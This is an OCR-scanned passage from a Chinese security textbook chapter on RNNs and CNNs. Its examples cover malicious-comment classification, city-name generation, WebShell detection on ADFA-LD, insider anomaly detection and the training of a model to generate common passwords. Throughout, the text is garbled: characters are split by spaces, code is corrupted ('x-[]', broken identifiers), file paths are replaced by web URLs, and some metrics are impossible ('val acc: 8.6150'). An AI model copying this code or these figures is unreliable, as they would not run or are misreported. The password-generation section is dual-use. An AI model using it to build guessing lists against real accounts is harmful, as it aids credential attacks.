| Adam | epoch: 001 | loss: 0.19170 - acc: 0.9450 | val . 





完整 演示 代码 请 见 本 书 GitHub 上 的 16-2.py 和 16-3.py。 


从 早期 的 BBS 到 现在 的 贴吧 、 
联网 的 发 展 ， 尤 其 是 移动 互联 网 的 发 展 ， 人 工 维护 几乎 成 了 不 可 能 完成 的 任务 。 


微 信 和 微 博 ， 恶 意 评 论 一 直 都 挥 之 不 去 ， 有 的 是 网 友 的 无 意 吐 模 ， 
这 次 我 们 尝试 使 用 机 器 学 习 的 方法 来 识别 恶意 评论 。 


loss: 0.16047 - val acc:0.9515 -- iter: 55000/55000 


有 的 是 水 军 的 恶意 攻击 。 以 往 大 型 互联 网 企业 都 需要 雇佣 大 量 的 运营 支撑 人 员 ， 人 工 进行 筛选 ， 随 着 互 
这 次 我 们 的 样本 采用 Movie Review Data 数 据 集 。 Movie Review Data 


数据 集 包含 1000 条 正面 的 评论 和 1000 条 负面 评论 ， 被 广泛 应 用 于 文本 分 类 尤其 是 恶意 评论 识别 方面 。 本 书 使 用 其 最 新 的 版 本 ，polarity dataset v2.0， 详 细 的 介绍 请 参考 第 3 章 内 容 。 


Movie Review Data 数 据 集 的 每 条 评论 都 保存 成 单独 的 一 个 文本 文件 ， 正 面 和 负面 的 评论 放置 在 不 同 的 文件 夹 下 面 ， 使 用 词 袋 模型 将 文本 向 量化 。 


读 取 文 件 ， 把 每 个 文件 转换 成 一 个 字符 串 : 








def 





File(fil 





1020 one | ename) : 











as f: 





with open (1 tilename) 
for line in f: 
xt-line 














turn x 





遍历 读 取 文件 夹 下 全 部 文件 : 











def load files (rootdir, label): 

list = os.listdir (rootdir) 

x-[] 

yell 

for i in range(0, len(list)): 
path = os.path.join(rootdir, list[i]) 

if os.path.isfile (path): 
print "Load file $s" $ path 
y.append (label) 
x.append(load one file (path) ) 

return x,y LEM 









































根据 不 同文 件 夹 ， 标 记 为 正面 和 负面 ， 其 中 正面 评论 标记 为 0， 负 面 评 论 标 记 为 1: 






































def load data(): 
x=] 
y-[] 
x1, yl=load files ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/movie-review-data/review polarity/txt sentoker 
X=x1+x2 
y-ylty2 


return X,y 


使 用 词 袋 模 型 将 数据 向 量化 ， 并 且 使 用 train_test_split 将 样本 随机 划分 成 训练 集合 和 测试 集合 ， 分 配 比例 为 0.4: 





x, y-load data () 






































x train, x test, y train, y test = train test split(x, y, test size-0.4, random state=0) 

Vp = learn.preprocessing.VocabularyProcessor (max document length-MAX DOCUMENT LENGTH, min frequency=1) 
vp.fit (x) 

x train = np.array(list(vp.transform(x train))) 

x test = np.array(list(vp.transform(x test))) 














n words-len (vp.vocabulary ) 
print('Total words: $d' $ n words) 


2. 训 练 样本 


NB 算法 在 文本 分 类 领域 有 着 广泛 的 应 用 ， 作 为 对 比 测试 ， 首 先 使 用 NB 算法 : 








gnb = GaussianNB () 
gnb.fit(x train, y train) 








识别 页 面 评论 过 程 如 图 16-8 所 示 。 





NB/RNN 模 型 训练 





特征 向量 


H- 


特征 问 量 NB/RNN 模 型 分 类 


分 类 标签 





图 16-8 RNN/NB 识 别 负 面 评 论 的 过 程 


RNN 特 别 适合 检测 时 序 型 数据 ， 所 以 需要 将 评论 转换 成 时 序数 据 ， 截 取 文 件 的 前 100 个 单词 作为 一 个 序列 ， 每 个 单词 又 由 词 袋 模型 进行 编码 ， 标 记 数 据 使 用 one-hot 编 码 ， 如 图 16-9 所 示 。 


特征 向 量 






截取 前 100 个 
单词 作为 序列 


中 长 度 为 100 的 时 序 向 量 








图 16-9 评论 内 容 转 换 成 RNN 可 以 处 理 的 时 序 向 量 


trainX = pad sequences (trainx, maxlen=100, value=0.) 
testX = pad sequences (testX, maxlen=100, value=0.) 
trainY = to categorical (trainY, nb classes=2) 

testY = to categorical (testY, nb classes-2) 


























构造 RNN 网 络 ， 输 入 层 长 度 为 100，embedding 输 入 的 数据 维度 为 词 袋 的 词汇 表 的 长 度 n_words， 输 出 的 数据 维度 定义 为 128，LSTM 层 随机 筛选 80% 的 数据 传递 给 下 一 层 : 





net = tflearn.input data([None, 100]) 
net = tflearn.embedding (net, input dim-n words, output dim-128) 
net = tflearn.lstm(net, 128, dropout-0.8) 





























全 连接 层 激 活 函 数 使 用 softmax 函 数 ， 输 出 数据 维度 为 2， 优 化 使 用 adam 算 法 ， 学 习 速 率 为 0.001: 


















































net = tflearn.fully connected(net, 2, activation-'softmax') 

net = tflearn.regression (net, optimizer-'adam', learning rate-0.001, 
loss-'categorical crossentropy') 

model = tflearn.DNN(net, tensorboard verbose-0) 

model.fit(trainX, trainY, validation set-(testX, testY), show metric-True, 

















batch size-32) 





NB 算法 比 对 测试 数据 集 的 预测 结果 与 标记 数据 ， 准 确 率 为 51% 左 右 : 











y predict = gnb.fit(x train, y train).predict(x test) 
Score = metrics.accuracy score(y test, y predict) 
print('NB Accuracy: {0:f}'.format (Score) ) 




















RNN 算 法 在 fit 函 数 中 直接 指定 了 测试 数据 集合 (testX, testY) : 








model.fit(trainX, trainY, validation set-(testX, testY), show metric-True, 
batch size-32) 





运行 结果 如 图 16-10 所 示 ， 准 确 率 61% 左 右 ， 不 是 特别 理想 。 

Training Step: 304 | total loss: 0.05232 | time: 12.625s 

| Adam | epoch: 008 | loss: 0.05232 - acc: 0.9918 | val loss: 1.18885 - 
val acc: 0.6275 -- iter: 1200/1200 


Training Step: 342 | total loss: 0.00589 | time: 11.747s 
| Adam | epoch: 009 | loss: 0.00589 - acc: 0.9997 | val loss: 1.31569 - 


val acc: 0.6162 -- iter: 1200/1200 

Training Step: 380 | total loss: 0.00362 | time: 11.822s 

| Adam | epoch: 018 | loss: 0.00362 - acc: 1.0000 | val loss: 1.42625 - 
val acc: 8.6150 -- iter: 1200/1200 
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图 16-10 RNN 识 别 评 论 结果 





RNN 具 有 记忆 性 ， 在 经 过 大 量 训练 后 可 以 学 习 到 时 序数 据 的 潜在 规律 ， 并 且 可 以 使 用 这 种 规律 随机 生成 新 的 序列 。 下 面 我 们 举 个 非常 有 趣 的 例子 ， 把 美国 现 有 的 城市 名 称 录 入 RNN，RNN 学 习 到 城市 
名 称 的 潜在 规律 后 ， 随 机 生成 新 的 城市 名 称 。 图 16-11 是 全 美 棒球 联盟 的 队 微 ， 几 了 乎 每 个 城市 都 有 自己 的 棒球 队 ， 并 且 会 以 城市 的 名 称 命名 球 队 。 完 整 演示 代码 请 见 本 书 GitHub 上 的 16-4.py.。 





图 16-11 ”以 城市 命名 的 美国 棒球 队 队 徽 


下 载 美国 城市 名 称 ， 下 载 链接 为 : 


保存 文件 为 US_Cities.txt， 文 件 内 容 如 下 : 


Abbeville 
Abbotsford 
Abbott 
Abbottsburg 
Abbottstown 
Abbyville 
Abell 
Abercrombie 
Aberdeen 
Aberfoil 
Abernant 
Abernathy 





























约定 城市 名 称 最 长 不 超过 20， 逐 行 读 取 城 市 名 称 ， 将 数据 向 量化 ， 并 生成 对 应 的 样本 以 及 标记 、 字 典 : 











path = "http://www.hzcourse.com/resource/readBook?path=/openresources/teach_ ebook/uncompressed/16472/OEBPS/Text/../data/US Cities.txt" 
maxlen = 20 
string utf8 = open (path, "r").read().decode('utf-8') 
X, Y, char idx = \ 

string to semi redundant sequences (string utf8, seq maxlen-maxlen, redun step-3) 


























构造 RNN， 使 用 LSTM 算 法 : 





flearn.input data(shape-[None, maxlen, len(char idx)]) 

Flearn.lstm(g, 512, return seq-True) 

Flearn.dropout (g, 0.5) 

learn.lstm(g, 512) 

learn.dropout(g, 0.5) 

learn.fully connected(g, len(char idx), activation='softmax') 
flearn.regression(g, optimizer-'adam', loss-'categorical crossentropy', 
learning rate-0.001) 
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对 应 的 RNN 结 构 如 图 16-12 所 示 。 


full connected 





图 16-12 ”自动 生成 城市 名 称 的 RNN 结 构 示 意图 


实例 化 基于 RNN 的 序列 生成 器 ， 并 使 用 对 应 的 字典 : 








m = tflearn.SequenceGenerator(g, dictionary-char idx, 
seq maxlen-maxlen, 
clip gradients=5.0, 
checkpoint path-'model us cities’) 








3. 验 证 效果 


使 用 随机 种 子 ， 通 过 RNN 模 型 随机 生成 城市 名 称 : 





for i in range(40): 
seed = random sequence from string(file lines, maxlen) 


































































































m.fit(X, Y, validation set-0.1, batch size-128, 
n epoch-1, run id-'us cities') 
print("-- TESTINGhttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/...") 
print("-- Test with temperature of 1.2 --") 
print (m.generate (30, temperature-1.2, seq seed-seed)) 
print("-- Test with temperature of 1.0 --") 
print (m.generate (30, temperature-1.0, seq seed-seed)) 
print("-- Test with temperature of 0.5 --") 
print (m.generate (30, temperature-0.5, seq seed-seed)) 





运行 程序 ， 学 习 现 有 城市 名 称 ， 训 练 数据 62106 条 ， 校 验 数据 6901 条 : 





Training samples: 62106 
Validation samples: 6901 


Temperature 定 义 为 新 颖 程度 ，Temperature 越 小 ， 自 动 生成 的 城市 名 称 越 接近 样本 中 的 城市 名 称 ，Temperature 越 大 ， 自 动 生 成 的 城市 名 称 与 样本 中 的 城市 名 称 差 别 越 大 。 当 Temperature 为 1.2: 
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Temperature731.0: 
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Temperature730.5 : 
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16.5 示例: 识别 WebShell 


完整 演示 代码 请 见 本 书 GitHub 上 的 16-5.py。 


1 数据 清洗 与 特征 化 


我 们 使 用 ADFA-LD 数 据 集中 关于 WebShell 的 数据 进行 实验 ,ADFA-LD 数 据 集 详 细 介 绍 请 阅读 第 3 章 相关 内 容 。ADFA-LD 本 质 上 是 通过 HIDS 记 录 系 统 在 正常 与 被 入 侵 情况 下 的 系统 调用 情况 。 系 统 调 用 


本 身 就 具有 时 序 性 ， 如 图 16-13 所 示 。 


特征 化 


系统 调用 厅 列 





图 16-13 ADFA-LD 数 据 时 序 化 示意 图 


逐 行 读 取 文件 ， 并 记录 当前 系统 调用 序号 的 最 大 值 ， 系 统 调 用 序号 使 用 整数 记录 : 

















def load one flle(filename): 
global max sys call 
x-[] 








with open(filename) as f: 
line-f.readline() 
line=line.strip('\n') 
line-line.split(' ') 
for v in line: 
if len(v) > 0: 
x.append (int (v) ) 
if int(v) > max sys call: 
max sys call-int (v) 























return X 


加 载 正常 系统 调用 序列 ， 并 标记 为 正常 : 





























def load adfa training files (rootdir): 
x-[] 
y=[] 
list = os.listdir (rootdir) 
for i in range(0, len(list)): 


path = os.path.join(rootdir, list[i]) 

if os.path.isfile (path): 
x.append(load one flle (path)) 
y.append(0) . 

return X,y 














加 载 WebShell 运 行 下 系统 调用 序列 ， 并 标记 为 WebShell: 


def load adfa webshell files (rootdir): 
x=[] 
vel 
allfile=dirlist (rootdir, []) 

for file in allfile: 









































EBPS/Text/../data/ADFA-LD/Attack Data Master/Web Shell \d+/U 








if re.match (r"http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/0E 
x.append (load one flle(file)) i 
y.append (1 
return X,y 























— 





将 正常 数据 与 异常 数据 混合 ， 随 机 分 配 成 训练 数据 集 和 测试 数据 集 : 





X1l,yl-load adfa training files ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/ADFA-LD/Training Data Master/") 
x2, y2=load adfa webshell files ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/ADFA-LD/Attack Data Master/") 







































































y2 
x train, x test, y train, y test = train test split(x, y, test size-0.4, random state=0) 





2. 训 练 样本 


构造 RNN， 使 用 LSTM 算 法 : 


















































net = tflearn.input data([None, max sequences len]) 

net = tflearn.embedding (net, input dim-max sys callt+l, output dim-128) 
net = tflearn.lstm(net, 128, dropout-0.8) 

net = tflearn.fully connected(net, 2, activation-'softmax') 

net = tflearn.regression (net, optimizer-'adam', learning rate=0.1, 














loss-'categorical crossentropy') 


实例 化 RNN ， 默 认 序列 长 度 为 100， 不 足 时 使 用 0 补 齐 : 





trainX = pad sequences (trainX, maxlen-max sequences len, value=0.) 
testX = pad sequences (testX, maxlen-max sequences len, value=0.) 



























































trainY = to categorical(trainY, nb classes-2) 

testY = to categorical(testY, nb classes-2) 

model = tflearn.DNN(net, tensorboard verbose-3) 

model.fit(trainX, trainY, validation set-(testX, testY), show metric-True, 


batch size-32,run id-"maidou") 
3. 验 证 效果 


使 用 测试 数据 集合 验证 效果 ， 准 确 率 约 93%， 效 果 图 见 图 16-14。 


raining Step: 162 | total loss: 0.17804 | time: 4.591s 

| Adam | epoch: 009 | loss: 4.17804 - acc: 0.9486 | val loss: €. 
32418 - val acc: 0.8924 -- iter: 5/0/50 

raining Step: 180 | total loss: 0.23187 | time: 4.586s 

| Adam | epoch: 0180 | loss: 8.23187 - acc: 0.9296 | val loss: 4. 
23488 - val acc: 0.9344 -- iter: 570/570 
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图 16-14 RNN 检 测 ADFA-LD 数 据 集中 的 WebShell 效 果 图 





16.6 示例 : 生成 常用 密码 


近 几 年 各 大 网 站 的 疑似 撞 库 以 及 密码 港 露 事 件 屡见不鲜 ， 从 CSDN、 小 米 到 网 易 等 ， 虽 然 互联 网 技术 迅速 友 展 ， 但 是 基于 用 户 名 和 密码 的 身份 认证 依然 还 是 主流 。 人 天 生 有 惰性 ， 以 密码 为 例子 ， 人 们 
都 喜欢 在 不 同 网 站 使 用 同样 的 密码 ， 一 旦 某 个 网 站 的 密码 被 泄露 ， 黑 产 便 可 以 长 驱 直 入 登录 其 他 网 站 (如 图 16-15 所 示 ) 。 


0110100101001010110- 


O1101010 NAME ADRES. 
D1101001010010101101001v、 
711010101011010101101011010. 


eruta LER 11010010011010: 
21 101001010010197 eh 111010011010. 





图 16-15 ”密码 泄露 事件 


人 们 在 设置 密码 的 时 候 ， 总 是 倾向 于 好 记 的 密码 ， 于 是 密码 便 和 常见 实物 具有 很 强 的 关联 性 ， 常 见 的 密码 之 间 也 存在 一 定 的 关联 性 ， 我 们 尝试 让 RNN 学 习 常 见 的 密码 ， 措 索 其 中 的 规律 ， 然 后 自动 生成 
新 密码 。 完 整 演示 代码 请 见 本 书 GitHub 上 的 16-6.py。 





我 们 使 用 WVS 自 带 的 密码 字典 作为 训练 集 。 


约定 密码 长 度 最 长 不 超过 10， 逐 行 读 取 密码 本 中 每 行 密码 ， 将 数据 向 量化 ， 并 生成 对 应 的 样本 以 及 标记 、 字 上 典 : 




















path = "nttp://www.hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/wvs-pass.txt" 
maxlen = 10 
string utf8 = open (path, "r").read()X, Y, char idx = \ 











string to semi redundant sequences (string utf8, seq maxlen-maxlen, redun step-3) 





2. 训 练 样本 


构造 RNN， 使 用 LSTM 算 法 : 








earn.input data(shape-[None, maxlen, len(char idx) ]) 

earn.lstm(g, 512, return seq-True) 

earn.dropout (g, 0.5) 

earn.lstm(g, 512) 

earn.dropout(g, 0.5) 

earn.fully connected(g, len(char idx), activation-'softmax') 

earn.regression(g, optimizer-'adam', loss-'categorical crossentropy', 
learning rate-0.001) 
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实例 化 基于 RNN 的 序列 生成 器 ， 并 使 用 对 应 的 字典 : 








m = tflearn.SequenceGenerator(g, dictionary-char idx, 
seq maxlen-maxlen, 
clip gradients=5.0, 
checkpoint path-'wvs pass') 


分 别 设置 不 同 的 新 颖 度 Temperature 来 生成 密码 : 








for i in range(40): 
seed = random sequence from string(file lines, maxlen) 






















































































m.fit(X, Y, validation set-0.1, batch size-128, 
n epoch-1, run id-'us cities!) 
print("-- TESTINGhttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/...") 
print("-- Test with temperature of 1.2 --") 
print (m.generate (30, temperature-1.2, seq seed=seed) ) 
print ("-- Test with temperature of 1.0 --") 
print (m.generate (30, temperature-1.0, seq seed-seed)) 
print("-- Test with temperature of 0.5 --") 
print (m.generate (30, temperature-0.5, seq seed-seed)) 














运行 程序 ， 学 习 现 有 城市 名 称 ， 训 练 数据 ?2463 条 ， 校 验 数据 5830 条 : 


Training samples: 52463 
Validation samples: 5830 





24Temperature731.2: 
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Temperature 为 0.5: 


y~~ 
3dmgam 
e2234687 
123433 
wonin12384 
ja 


16.7 示例 : 识别 异 弟 操作 


Gitlab 的 一 位 系统 管理 员 在 给 线 上 数据 库 做 负载 均衡 工作 时 ， 遭 受 了 DDoS 攻击 。 在 阻止 了 攻击 之 后 ， 运 维 人 员 发 现 了 数据 库 不 同步 的 问题 ， 便 开始 修复 。 在 修复 过 程 中 ， 错 误 地 在 生产 环境 上 执行 了 数 
据 库 目录 删除 命令 ( 见 图 16-16) ,导致 300GB 数 据 被 删除 ，Gitlab 被 迫 下 线 。 在 恢复 的 过 程 中 ， 他 们 发 现 只 有 db1.staging 的 数据 库 可 以 用 于 恢复 ， 而 其 他 5 种 备份 机 制 都 不 可 用 。db1.staging 是 6 小 时 前 
的 数据 ， 而 且 传 输 速 率 有 限 ， 导 致 恢复 进程 缓慢 ，Gitlab 最 终 丢 掉 了 差不多 6 个 小 时 的 数据 。 





图 16-16 ”Gitlab 被 管理 员 误 删除 


黑客 入 侵 Web 服 务 器 以 后 ， 通 常会 通过 系统 漏洞 进一步 提 权 ， 获 得 root 权 限 ， 内 部 员工 的 违规 操作 同样 也 可 能 造成 巨大 危害 。 我 们 试图 通过 搜集 Linux 服 务 器 的 bash 操 作 日 志 ， 通 过 训练 识别 出 特定 用 
户 的 操作 习惯 ， 然 后 进一步 识别 出 异常 操作 行为 。 完 整 演示 代码 请 见 本 书 GitHub 上 的 16-7.py。 


1 .数据 清 洗 与 特征 化 


我 们 使 用 SEA 数 据 集 涵盖 70 多 个 UNIX 系 统 用 户 的 行为 日 志 ， 这 些 数据 来 自 UNIX 系 统 acct 机 制 记 录 的 用 户 使 用 的 命令 。SEA 数 据 集中 每 个 用 户 都 采集 了 15000 条 命令 ， 从 用 户 集合 中 随机 抽取 50 个 用 户 作 
为 正常 用 户 ， 剩 余 用 户 的 命令 块 中 随机 插入 模拟 命令 作为 内 部 伪装 者 攻击 数据 。 关 于 SEA 数据 集 的 详细 介绍 请 参考 第 3 章 中 的 内 容 。 


逐 行 读 取 并 加 载 命令 : 








def load user cmd new (filename): 
cmd list-[] 
dist=[] 
with open(filename) as f: 
i=0 
x=[] | 
for line in f: 
line=line.strip('\n') 
x. append (line) 
dist.append (line) 
it=1 


























每 100 个 命令 组 成 一 个 向 量 : 





if i == 100: 
cmd list.append (x) 
x=[] 
i=0 





把 每 个 命令 当成 一 个 单词 ， 使 用 词 集 模型 进行 处 理 : 





fdist = FreqDist (dist) .keys () 





使 用 生成 词 集 的 词汇 表 对 操作 命令 进行 编码 ， 将 操作 命令 序列 化 : 





def get user cmd feature new(user cmd list,dist): 
user cmd feature-[] 

for cmd list in user cmd list: 
x-[] 

for cmd in cmd list: 
v = [0] * len(dist 

for i in range(0, len(dist)): 

if cmd = dist[i]: 

v[i] = 1 

x.append (v) 




















— 

















user cmd 


feature.append (x) 


return user cmd . 





feature 





一 /小 











RNN 识 别 异常 的 流程 如 图 16-17 所 示 。 











练 集 ， 后 70 个 命令 块 为 测试 集 








一 共 记 录 了 15000 个 命令 共 150 个 命令 序列 ， 每 个 命令 序列 长 度 固定 ， 均 为 100。 前 80 个 命令 


以 User3 为 例 ， 文 件 中 




















user cmd list,dist-load user cmd new("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/. ./data/MasqueradeDat/User7") 
n words-len (dist) 

user cmd feature-get user cmd feature new(user cmd list,dist) 
labels-get label ("http://www.hzcourse. ~com/resource/readBook?path=/openresources/teach_ebook/uncompressed/16472/OEBPS/Text/. . /data/MasqueradeDat /label.txt", 6) 


y=[0] *50+labels 

































































x train=user cmd feature[0:N] 
y train-y[0:N]  — 

x test-user cmd feature[N:150] 
y test-y[N: 150] 
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图 16-17 RNN 识 别 异 常 操作 流程 图 


定义 RNN 结 构 ， 其 具有 两 层 Istm 结 构 : 













































































net = tflearn.input data(shape-[None, 100,n words]) 

net = tflearn.lstm(net, 10, return seq-True) 

net = tflearn.lstm(net, 10, ) 

net = tflearn.fully connected(net, 2, activation-'softmax') 

net = tflearn.regression (net, optimizer-'adam', learning rate-0.1,name-"output", 
loss-'categorical crossentropy') 

model — tflearn.DNN(net, tensorboard verbose-3) 

3. 验 证 效果 

训练 并 交叉 验证 测试 集合 

















model.fit(x train, y train, validation set-(x test, y test), show metric-True, 
batch size-32,run id-"maidou") 











练 集合 大 小 为 80， 测 试 集合 大 小 为 70， 准 确 率 在 94% 以 上 ， 如 图 16-18 所 示 。 





其 中 训 


Training Step: 27 | total loss: 0.22801 | time: 1.34@s 
| Adam | epoch: 009 | loss: 0.22801 - acc: 0.9152 | val. loss: 0.16982 
- val.acc: 0.9571 -- iter: 80/80 


Training Step: 30 | total loss: 0.19737 | time: 1.334s 


| Adam | epoch: 010 | loss: 0.19737 - acc: 0.9352 | val. loss: 0.18740 
- val. acc: 0.9429 -- iter: 80/80 


(tensorflow) B0000000B60544:code liu.yan$ 


图 16-18 RNN 识 别 异 常 操 作 结 果 





168 本章 小 结 


本 章 重 点 介绍 RNN 的 基础 知识 以 及 Web 安 全 领域 的 相关 应 用 ， 包 括 识别 验证 码 、 识 别 恶意 评论 、 识 别 WebShell、 识 别 异 常 操作 等 。 RNN 独 特 的 使 用 记忆 人 能力， 让 它 在 众多 领域 ， 尤 其 是 在 时 序 领 域 大 展 
身手 ， 其 通过 学 习 历 史 数 据 自 动 生 成 新 数据 的 能 力 令 人 叹为观止 。 


参考 资源 


我 写作 本 章 时 参考 了 以 下 网 站 ， 读 者 要 想 进 一 步 学 习 ， 欢 迎 到 这 些 网 站 进一步 了 解 更 多 信息 : 
- http://colah.github.io/posts/2015-08-Understanding-LSTMs/ 
- https://github.com/tensorflow/tensorflow/tree/master/tensorflow/examples/learn 
- https://www.tensorflow.org/get_started/tflearn 
- http://tflearn.org/examples / 
: https://github.com/tflearn/tflearn/blob/master/examples/nlp/ 
: http://tdc.hundsun.com/portal/atticle/656.html 


有 一 些 参考 文献 值得 一 读 ; 
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第 17 草 ” 卷 积 神经 网 络 算法 


卷 积 神经 网 络 算法 在 图 像 处 理 领 域 有 着 广泛 应 用 ， 它 独特 的 着 积 处 理 与 池 化 能 力 ， 可 以 对 图 像 数 据 在 不 用 做 复杂 预 处 理 的 情况 下 ， 直 接 自 动 提取 高 级 特征 ， 并 进一步 分 析 ， 同 时 使 得 计算 复杂 度 以 指数 
级 别 下 降 。 卷 积 神经 网 络 算法 在 安全 领域 的 表现 如 何 呢 ? 本 章 将 首先 介绍 卷 积 神经 网 络 算法 的 基本 概念 和 基本 使 用 方法 ， 然 后 通过 案例 讲解 如 何 使 用 卷 积 神经 网 络 算法 识别 恶意 评论 ， 识 别 垃圾 邮件 等 。 

` ` * SCIL 
17.1 “ 卷 积 神经 网 络 算法 概述 


人 脸 识别 等 图 像 识别 技术 正在 改变 人 们 的 生活 ， 如 图 17-1 所 示 ， 回 顾 之 前 识别 M NIST 数 据 集 时 ，28x28 的 图 片 识别 数字 的 成 功率 都 徘徊 在 959% 左 右 ， 那 是 什么 样 的 技术 让 图 像 识别 长 足 发 展 的 呢 ? 答案 
就 是 卷 积 神经 网 络 。 





图 17-1 人 脸 识 别 


卷 积 神经 网 络 (Convolutional Neural Network, CNN) 原本 是 在 图 像 处 理 领域 应 用 的 ， 后 来 广泛 应 用 于 文本 处 理 、 语 音 识别 等 领域 .CNN 是 近年 发 展 起 来 的 ， 并 引起 广泛 重视 的 一 种 高 效 识 别 图 像 
的 方法 。20 世 纪 60 年 代 ，Hubel 和 Wiesel 在 研究 猫 脑 皮 层 中 用 于 局 部 敏感 和 方向 选择 的 神经 元 时 发 现 其 独特 的 网 络 结构 可 以 有 效 地 降低 反馈 神经 网 络 的 复杂 性 ， 继 而 提出 了 卷 积 神经 网 络 。 现 在 ，CNN 已 经 
成 为 众多 科学 领域 的 研究 热点 之 一 ， 特 别 是 在 模式 分 类 领域 ， 由 于 该 网 络 避 免 了 对 图 像 的 复杂 前 期 预 处 理 ， 可 以 直接 输入 原始 图 像 ， 因 而 得 到 了 更 为 广泛 的 应 用 ， 如 图 17-2 所 示 。K.Fukushima 在 1980 年 提 
出 的 新 识别 机 是 卷 积 神经 网 络 的 第 一 个 实现 网 络 。 随 后 ， 更 多 的 科研 工作 者 对 该 网 络 进行 了 改进 。 其 中 ， 具 有 代表 性 的 研究 成 果 是 Alexander 和 Taylor 提 出 的 “改进 认 知 机 ”， 该 方法 综合 了 各 种 改进 方法 的 
优点 并 避免 了 耗 时 的 误差 反 向 传播 。 
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图 17-2 CNN 图 像 处 理 示 例 图 


在 DNN 这 类 全 连接 神经 网 络 算法 中 ， 隐 茂 层 的 前 一 层 的 每 个 节点 都 需要 与 下 一 层 的 每 个 节点 连接 ， 当 节点 数量 访 大 时 ， 产 生 的 连接 就 非常 多 ， 这 样 ， 在 硬件 环境 有 限 的 情况 下 就 几乎 难以 完成 训练 过 
程 ， 如 图 17-3 所 示 。 





图 17-3 ”全 连接 神经 网 络 


为 了 解决 图 像 处 理 领 域 全 连接 造成 的 计算 量 巨 大 的 问题 ， 人 们 提出 了 局 部 连接 ， 如 图 17-4 所 示 。 其 理论 基础 是 基于 这 样 的 假设 : 生物 在 进行 图 像 识 别 时 ， 对 图 像 的 理解 只 需要 处 理 局 部 的 数据 即 可 ， 不 
需要 全 面 分 析 全 部 图 像 后 才能 进行 处 理 。 这 一 假设 在 图 像 处 理 领 域 得 到 了 广泛 应 用 ， 证 明 其 简单 有 效 。 








图 17-4 局 部 连接 神经 网 络 


在 卷 积 神经 网 络 中 有 几 个 概念 需要 介绍 一 下 。 


所 谓 权 值 共 享 是 指 当 从 一 个 大 尺寸 图 像 中 随机 选取 一 小 块 ， 比 如 说 8x 8 作为 样本 ， 并 且 从 这 个 小 块 样本 中 学 习 到 了 一 些 特 征 ， 这 时 我 们 可 以 把 从 这 个 8x8 样 本 中 学 习 到 的 特征 作为 探测 器 ， 应 用 到 这 个 
图 像 的 任意 地 方 。 特 别 是 ， 我 们 可 以 用 从 8x 8 样本 中 所 学 习 到 的 特征 跟 原 本 的 大 尺寸 图 像 作 卷 积 ， 从 而 在 这 个 大 尺寸 图 像 上 的 任 一 位 置 获 得 一 个 不 同 特征 的 激活 值 。 


如 图 17-5 所 示 ， 展 示 了 一 个 3x3 的 卷 积 核 在 5?x 5 的 图 像 上 做 卷 积 的 过 程 。 每 个 卷 积 都 是 一 种 特征 提取 方式 ， 就 像 一 个 筛子 ， 将 图 像 中 符合 条 件 (激活 值 越 大 越 符合 条 件 ) 的 部 分 筛选 出 来 。 





t BUE: 





图 17-5 ”CNN 权 值 共 享 原理 
所 谓 池 化 是 指 人 们 可 以 计算 图 像 一 个 区 域 上 的 某 个 特定 特征 的 平均 值 或 者 最 大 值 。 这 些 概要 统计 特征 不 仅 具 有 低 得 多 的 维度 ， 同 时 还 会 改善 结果 。 这 种 聚合 的 操作 就 叫做 池 化 。 


基于 局 部 连接 、 权 值 共 享 以 及 池 化 层 的 降 采 样 ， 进 一 步 发展 成 了 完整 的 CNN 算 法 ， 关 于 CNN 的 详细 算法 说 明 不 是 本 书 的 重点 ， 有 兴趣 的 读者 可 以 参考 本 章 最 后 的 参考 文献 。 


17.2 示例 : hello world! 卷 积 神经 网 络 


完整 演示 代码 请 见 本 书 GitHub 上 的 17-1.py。 
1 .数据 清洗 与 特征 化 


我 们 继续 使 用 M NIST 数 据 集 ，M NIST 数 据 集 的 详细 介绍 请 阅读 第 3 章 相 关内 容 。 这 次 我 们 利用 TFLearn 提 供 的 API 来 获取 M NIST 数 据 集 : 








X, Y, testX, testY = mnist.load data(one hot-True) 


第 一 次 调用 这 个 API 的 时 候 ， 会 自动 下 载 M NIST 数 据 集 到 默认 目录 : 











































































































































































































Downloading MNISThttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 
Succesfully downloaded train-images-idx3-ubyte.gz 9912422 bytes. 

Extracting mnist/train-images-idx3-ubyte.gz 

Downloading MNISThttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 
Succesfully downloaded train-labels-idxl-ubyte.gz 28881 bytes. i 

Extracting mnist/train-labels-idxl-ubyte.gz 

Downloading MNISThttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 
Succesfully downloaded t10k-images-idx3-ubyte.gz 1648877 bytes. 

Extracting mnist/t10k-images-idx3-ubyte.gz 

Downloading MNISThttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 
Succesfully downloaded tl10k-labels-idxl-ubyte.gz 4542 bytes. 

Extracting mnist/t10k-labels-idxl-ubyte.gz 






































后 继 再 调用 该 API 时 会 自动 从 默认 目录 中 加 载 对 应 的 文件 : 








tracting mnist/train-images-idx3-ubyte.gz 
tracting mnist/train-labels-idx1l-ubyte.gz 
tracting mnist/tlOk-images-idx3-ubyte.gz 
tracting mnist/tlOk-labels-idxl-ubyte.gz 
























































图 片 样本 大 小 为 28x28，TFLearn 默 认 将 其 转换 成 维度 为 784 的 向 量 ， 为 了 处 理 方便 ， 需 要 恢复 成 28x28 的 二 维 向 量 : 





X = X.reshape([-1, 28, 28, 1]) 
testX = testX.reshape([-1, 28, 28, 1]) 


2. 训 练 样本 


构造 CNN 网 络 ， 定 义 输入 层 ， 大 小 为 28x28: 





net = tflearn.input data(shape-[None, 28, 28, 1]) 


fies ASA: 





net = tflearn.conv 2d(net, 64, 3, activation-'relu', bias-False) 











